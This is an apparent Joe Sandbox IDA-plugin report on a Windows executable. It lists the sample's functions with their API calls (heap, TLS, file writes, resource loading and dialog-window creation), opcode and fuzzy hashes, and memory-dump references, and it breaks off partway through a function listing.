Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocHeap$CreateValue
String ID:
API String ID: 493873155-0
Opcode ID: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
Instruction ID: 280f0189a1b64710240dfbe11500258ab370f1237584088fdcd0bc4150eb2939
Opcode Fuzzy Hash: db5b467741c0f00c93d1fd6ff26af59c18c3d1bccb059c91a176208ebbe690b4
Instruction Fuzzy Hash: F1D012705C83046BE7002BB2BC4A7843A78DB04751F20843AFA095B3D0DAB45480895D

Function 0040E500 Relevance: 3.0, APIs: 2, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE(02490000,?,004011C0,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007), ref: 0040E509
TlsFree.KERNELBASE(0000000D,?,004011C0,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007), ref: 0040E516

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: DestroyFreeHeap
String ID:
API String ID: 3293292866-0
Opcode ID: 875c8584e72ba4f9f6744ae97eca28bebe5277f14eb27a090d40f9eb6c4fb1f8
Instruction ID: d3e7c01ca3d7982612482afa56f4a58b9e79d24a02adeb1917deb37a1309afc3
Opcode Fuzzy Hash: 875c8584e72ba4f9f6744ae97eca28bebe5277f14eb27a090d40f9eb6c4fb1f8
Instruction Fuzzy Hash: D8C04C71158208ABCB049BA8FD488D63BBDE7486013448578B50D837A1DA75E840CB58

Function 0040B050 Relevance: 2.5, APIs: 2, Instructions: 31memoryCOMMON

Download Yara Rule

APIs

HeapFree.KERNEL32(00000000,?,00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000), ref: 0040B093
CloseHandle.KERNELBASE(00000000,00000000,?,?,00403394,00000000,00000000,00000800,00000000,00000000,00000000,00000000,?,00000000,00000000,00000800), ref: 0040B09B

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CloseFreeHandleHeap
String ID:
API String ID: 1642312469-0
Opcode ID: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
Instruction ID: 7abf06afc9ef833db34d05f69b67e4dbbe1385027aa9b24abf0250c41048a97e
Opcode Fuzzy Hash: bcdd82019f876fc489b22f42e5959096ccfe265fa7cf8be21467e7666472b7d6
Instruction Fuzzy Hash: 1AF08C32505110ABC6322B6AEC09E8BBA72EF81724F148A3FF125314F4CB794850DF9C

Function 00402BA6 Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231

GetShortPathNameW.KERNEL32(02499760,02499760,00002710), ref: 00402BE0

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 0040E560: TlsGetValue.KERNEL32(0000000D,00000000,00000000), ref: 0040E56C
Part of subcall function 0040E560: RtlAllocateHeap.NTDLL(02490000,00000000,?), ref: 0040E599

Part of subcall function 0040A200: HeapFree.KERNEL32(00000000,00000000,00401B7C,00000000,00000000,?,00000000,00000000,00417024,00000000,00000000,?,00000000,?,00000000,00000000), ref: 0040A20C

Part of subcall function 0040E6C0: wcslen.MSVCRT ref: 0040E6D7

Part of subcall function 00405170: TlsGetValue.KERNEL32(?,?,00402F99,00000000,00000008,00000001,00000000,00000000,00000000,00000000,00000000,?,00000200,00000000,00000000,00000000), ref: 00405178

Part of subcall function 0040E5F0: HeapFree.KERNEL32(02490000,00000000,00000000,?,00000000,?,00412484,00000000,00000000,-00000008), ref: 0040E608

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: HeapValue$AllocateErrorFreeLast$NamePathShortwcslen
String ID:
API String ID: 192546213-0
Opcode ID: f052a35f039049b8e927063d295d98a1685d0b83d51531e0627689d3041be432
Instruction ID: cfcced4fe20ace1cb9c77e507b1d6c1eac9b345b0de8df7ff04b6d7fabcc8d03
Opcode Fuzzy Hash: f052a35f039049b8e927063d295d98a1685d0b83d51531e0627689d3041be432
Instruction Fuzzy Hash: ED012975108205BAE501BB72DD06D3F7669EF80718F108C3EB444B50E2EA3D9C616A2E

Function 0040B0C0 Relevance: 1.5, APIs: 1, Instructions: 25fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNELBASE(00000000,?,?,00000000,00000000,00000000,?,0040B088,00000000,00000000,?,?,00403394,00000000,00000000,00000800), ref: 0040B0E7

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
Instruction ID: 9ab85608ef899c62796374e569d53c100cb89dcb0d5a9370bd5502097d7715ab
Opcode Fuzzy Hash: c522352010aa0ffdeb1c8550a8e7d9d94415fd1ef62632f4db173a1ec829df8d
Instruction Fuzzy Hash: F4F0F276104601AFD320CF58D808B87FBE8EB48321F00C82EE59AC2A50C730E810DB55

Function 00402B6D Relevance: 1.5, APIs: 1, Instructions: 19COMMON

Download Yara Rule

APIs

GetNativeSystemInfo.KERNEL32(00000000,?,00000000,00000000), ref: 00402B89

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: InfoNativeSystem
String ID:
API String ID: 1721193555-0
Opcode ID: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
Instruction ID: 9093739e4f63ff22c3e940b982bbbee8e150dd58fd9266ea6ee1473296d97692
Opcode Fuzzy Hash: 700b71109f0c023e3e1c18d21fddf158996dc8241789cbbab02419d6e0a745b1
Instruction Fuzzy Hash: EBD0C26041810846D710BE658509B9B73E8D700304F608C3AE084961C1F3FCE9D5821B

Function 00409F4C Relevance: 1.5, APIs: 1, Instructions: 13COMMON

Download Yara Rule

APIs

GetExitCodeProcess.KERNELBASE(02499760,00000000), ref: 00409F5D

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CodeExitProcess
String ID:
API String ID: 3861947596-0
Opcode ID: 715b6f65d563b86cc3bdca33aaaaf00355598db4e158a89ac330bb58c24c5061
Instruction ID: 3777f5150e176a53f53c72294df7b811d779eaf56e205e5e018731d595f7ee1c
Opcode Fuzzy Hash: 715b6f65d563b86cc3bdca33aaaaf00355598db4e158a89ac330bb58c24c5061
Instruction Fuzzy Hash: 97D0927A91410CFBCB00CB84D945AD9B7FCEB09351F5041A5E904D3210DA35AE14ABA9

Function 0040A220 Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
Instruction ID: b6192ce9428b1ba2f4eef992fd110c0ccadf60e3b61bfdacf1c665f796a5839f
Opcode Fuzzy Hash: c9295373328ff73b20fc6ca55934024a7e081ff9ecf7500422664bd763381941
Instruction Fuzzy Hash: 97C04C713442006AE6509B24DE09F5776A9BB70742F00C43A7545D11B4DA31D860D72D

Function 0040D944 Relevance: 1.5, APIs: 1, Instructions: 8COMMON

Download Yara Rule

APIs

TlsFree.KERNELBASE(004011E9,004011BB,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 0040D961

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Free
String ID:
API String ID: 3978063606-0
Opcode ID: 15811b3f4bfa737b04153fc01c2ce6e2fcfebc8c37dca603a4479fd71a9de331
Instruction ID: 46558f9b80a24c5afc9091c09e7b4622d133e72bbd02e604b330f91c0f3fc2b8
Opcode Fuzzy Hash: 15811b3f4bfa737b04153fc01c2ce6e2fcfebc8c37dca603a4479fd71a9de331
Instruction Fuzzy Hash: 15C0487080A200EEEF26ABA4ED0C7E13A71B34430AF84847A9005615F0EB78088CDB8C

Function 0040A1C0 Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON

Download Yara Rule

APIs

HeapCreate.KERNELBASE(00000000,00001000,00000000,0040106C,00000000,00001000,00000000,00000000), ref: 0040A1C9

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: CreateHeap
String ID:
API String ID: 10892065-0
Opcode ID: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
Instruction ID: 5a0dfe59a05c5f03c374f6d2b2c7d0e1199ed08054282bce4923ddabcda8d052
Opcode Fuzzy Hash: 632f7ef1fd3851381c9f94796d2a32ace23046017034c32eb606c36269a48e04
Instruction Fuzzy Hash: 10B012702C43005AF2500B209C0AB8039609304B43F304024B2015A1D4CAF01080852C

Function 0040993E Relevance: 1.5, APIs: 1, Instructions: 5COMMON

Download Yara Rule

APIs

TerminateProcess.KERNELBASE(00000000,000000FF,00403DE2,?,00000000,00000000,00000000,0041702A,?,00000000,00000000,00000000,00000044,00000000,?,00000000), ref: 00409946

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 81ec7d1a7ecaba98e0bd38f101adc261472a3716388094779b9fbb69d1566738
Instruction ID: 6c9933f8183c3cf90a70a052d5255c7038314b529614842de31663aab6e25bc5
Opcode Fuzzy Hash: 81ec7d1a7ecaba98e0bd38f101adc261472a3716388094779b9fbb69d1566738
Instruction Fuzzy Hash: DCB0127120C000BFCA00CB08CE04C057BB1AB513307108360B134410F4CB305814DB05

Function 0040A1B0 Relevance: 1.5, APIs: 1, Instructions: 3memoryCOMMON

Download Yara Rule

APIs

HeapDestroy.KERNELBASE(004011EE,004011BB,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 0040A1B6

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: DestroyHeap
String ID:
API String ID: 2435110975-0
Opcode ID: 5b23630fc93442f681a8b5ff80044f68663a3a9fb33361d4051a1176eb808dd7
Instruction ID: c9db44b6d67b1d9878fbeffb7de266838096d73083f09c44833cc4f7101008e2
Opcode Fuzzy Hash: 5b23630fc93442f681a8b5ff80044f68663a3a9fb33361d4051a1176eb808dd7
Instruction Fuzzy Hash: 30900270504000CBDF015B25EF0C4843E75E74030131091F59019400B1CA314451DA0C

Non-executed Functions

Function 00402664 Relevance: 4.5, APIs: 3, Instructions: 25COMMON

Download Yara Rule

APIs

Part of subcall function 0040E660: TlsGetValue.KERNEL32(0000000D,?,00402EF9,00000000,00000000,00000000,00000000,?,0040118D,00000000,00000000,00000000,00000001,00000004,00000000,00417064), ref: 0040E677

LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000), ref: 00402675
SizeofResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00402685

Part of subcall function 0040A220: RtlAllocateHeap.NTDLL(00000008,00000000,00402EAC,00000200,00000000,0000000A,00000000,00000000,00000000,00000000,00000000,00000000,004044FA,00000000,00000000,00000000), ref: 0040A231

Part of subcall function 0040A300: memcpy.MSVCRT(?,00000000,00000000,?,?,004026B1,02499760,02499760,00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000), ref: 0040A310

FreeResource.KERNEL32(?,02499760,02499760,00000000,00000000,00000000,00000000,00000000,00000000,00402E90,00000000,00000000,0000000A,00000000,00000000,00000000), ref: 004026B4

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Resource$AllocateFreeHeapLoadSizeofValuememcpy
String ID:
API String ID: 4216414443-0
Opcode ID: eb9f5e1a2f9d4593073a7ec5f81ff8e9b0a970554bd78e40bca009d4aa2b3f01
Instruction ID: 5824db8a20ede0dd59727c61e03ef1c30c3ca7ac97c8101ba0d9721411e394a8
Opcode Fuzzy Hash: eb9f5e1a2f9d4593073a7ec5f81ff8e9b0a970554bd78e40bca009d4aa2b3f01
Instruction Fuzzy Hash: C9F0F871018305EFDB01BF61EC0182EBEA1FB54304F108C3EF488511B1D7378868AB5A

Function 00405573 Relevance: 3.1, APIs: 2, Instructions: 128COMMON

Download Yara Rule

APIs

GetVersionExW.KERNEL32(?), ref: 00405593

Part of subcall function 0040552C: memset.MSVCRT ref: 0040553B
Part of subcall function 0040552C: GetModuleHandleW.KERNEL32(ntdll.dll,?,?,00000000), ref: 0040554A
Part of subcall function 0040552C: GetProcAddress.KERNEL32(00000000,RtlGetVersion), ref: 0040555A

GetVersionExW.KERNEL32(?), ref: 004055F2

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Version$AddressHandleModuleProcmemset
String ID:
API String ID: 3445250173-0
Opcode ID: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
Instruction ID: 26d0d35871443cf73a281a40cb18e3271032821f4299fa5ffe9ef0f91627ffe6
Opcode Fuzzy Hash: b665be2987f77f662ff3f1567eed7b7eb98d8ed0a6deb91f434bba4fd19d7b4a
Instruction Fuzzy Hash: 9B31BF32924F1882D23085648D45BB76AA4E751760FD90F37DD9EB72E0D23F8D458D8E

Function 00409FB0 Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(00409F70,00401180,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000), ref: 0040A0EC
SetUnhandledExceptionFilter.KERNEL32(00401180,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074,004180F0,00000004,00000000,00417064), ref: 0040A100

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: b7e867c821acaf844bbdab562fa5546bc418851262dc6eefeb18a67462b4137d
Instruction ID: ed707b84e897ebd9365ef63bb97156212438ba645da498dcb76798098b5433cd
Opcode Fuzzy Hash: b7e867c821acaf844bbdab562fa5546bc418851262dc6eefeb18a67462b4137d
Instruction Fuzzy Hash: 76E0C2B2508380FFC3108F20E94C687BBF4BB55741F00C93EA80A927A0CB748852EB1E

Function 00409FD0 Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(004011DA,004011BB,00000000,004180A0,00000000,00000000,00000000,00000001,00000004,00000000,00417064,00000008,0000000C,000186A1,00000007,00417074), ref: 00409FD6

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
Instruction ID: ac8206da82d6392f4af85a502d91db7afc58579d845f6d3a682825b86ab87252
Opcode Fuzzy Hash: 3170e1e652b57c97785d64ceb6e545c80be0e67c980fbb0402b9cecf21492773
Instruction Fuzzy Hash: 68B0017A404180EFDB015F20ED4C7C63FB2B746745FD08AB8980181770CB790496DA0C

Function 00408F69 Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 270windowregistrymemoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00408E58: wcslen.MSVCRT ref: 00408E64
Part of subcall function 00408E58: HeapAlloc.KERNEL32(00000000,00000000,?,00408F81,?), ref: 00408E7A
Part of subcall function 00408E58: wcscpy.MSVCRT ref: 00408E8B

GetStockObject.GDI32(00000011), ref: 00408FB2
LoadIconW.USER32 ref: 00408FE9
LoadCursorW.USER32(00000000,00007F00), ref: 00408FF9
RegisterClassExW.USER32 ref: 00409021
IsWindowEnabled.USER32(00000000), ref: 00409048
EnableWindow.USER32(00000000), ref: 00409059
GetSystemMetrics.USER32(00000001), ref: 00409091
GetSystemMetrics.USER32(00000000), ref: 0040909E
CreateWindowExW.USER32(00000000,00000000,10C80000,-00000096,?,?,?,?,?), ref: 004090BF
SetWindowLongW.USER32(00000000,000000EB,?), ref: 004090D3
CreateWindowExW.USER32(00000000,STATIC,?,5000000B,0000000A,0000000A,00000118,00000016,00000000,00000000,00000000), ref: 00409101
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409119
CreateWindowExW.USER32(00000200,EDIT,00000000,00000000,0000000A,00000020,00000113,00000015,00000000,0000000A,00000000), ref: 00409157
SendMessageW.USER32(00000000,00000030,00000001), ref: 00409169
SetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409171
SendMessageW.USER32(0000000C,00000000,00000000), ref: 00409186
wcslen.MSVCRT ref: 00409189
wcslen.MSVCRT ref: 00409191
SendMessageW.USER32(000000B1,00000000,00000000), ref: 004091A3
CreateWindowExW.USER32(00000000,BUTTON,00413080,50010001,0000006E,00000043,00000050,00000019,00000000,000003E8,00000000), ref: 004091CD
SendMessageW.USER32(00000000,00000030,00000001), ref: 004091DF
CreateAcceleratorTableW.USER32(?,00000002,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00409216
SetForegroundWindow.USER32(00000000), ref: 0040921F
BringWindowToTop.USER32(00000000), ref: 00409226
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00409239
TranslateAcceleratorW.USER32(00000000,00000000,?), ref: 0040924A
TranslateMessage.USER32(?), ref: 00409259
DispatchMessageW.USER32(?), ref: 00409264
DestroyAcceleratorTable.USER32(00000000), ref: 00409278
wcslen.MSVCRT ref: 00409289
wcscpy.MSVCRT ref: 004092A1
HeapFree.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004092B4

Strings

EDIT, xrefs: 0040914D
STATIC, xrefs: 004090FB
D0A, xrefs: 00409003
BUTTON, xrefs: 004091C6
0, xrefs: 00408FC5

Memory Dump Source

Source File: 00000007.00000002.2374692013.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2374656119.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375132113.0000000000413000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375186828.0000000000417000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000007.00000002.2375236735.0000000000419000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_1759c0aff4.jbxd

Similarity

API ID: Window$Message$CreateSend$wcslen$Accelerator$HeapLoadMetricsSystemTableTranslatewcscpy$AllocBringClassCursorDestroyDispatchEnableEnabledFocusForegroundFreeIconLongObjectRegisterStock
String ID: 0$BUTTON$D0A$EDIT$STATIC
API String ID: 54849019-2968808370
Opcode ID: 64b7048e9784f6b3a965978878b2fb0e8fb718a1bb0b3c0aee67433a202d6ab7
Instruction ID: ac9e317f2143d035474ccc6d8eb2369134aae38ec411cec841dcb6eceac04435
Opcode Fuzzy Hash: 64b7048e9784f6b3a965978878b2fb0e8fb718a1bb0b3c0aee67433a202d6ab7
Instruction Fuzzy Hash: FC919071548300BFE7219F65DD49F9B7BE9EB48B50F00483EFA84A61E1CBB988408B5D

Function 00401511 Relevance: 26.6, APIs: 1, Strings: 14, Instructions: 335fileCOMMON

Download Yara Rule

APIs

WriteFile.KERNEL32(?,00000000,?,?,00000000,?), ref: 00401648

Part of subcall function 0040E520: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 0040E526
Part of subcall function 0040E520: TlsGetValue.KERNEL32(0000000D), ref: 0040E535
Part of subcall function 0040E520: SetLastError.KERNEL32(?), ref: 0040E54B

Part of subcall function 004057F0: wcsncmp.MSVCRT ref: 00405853
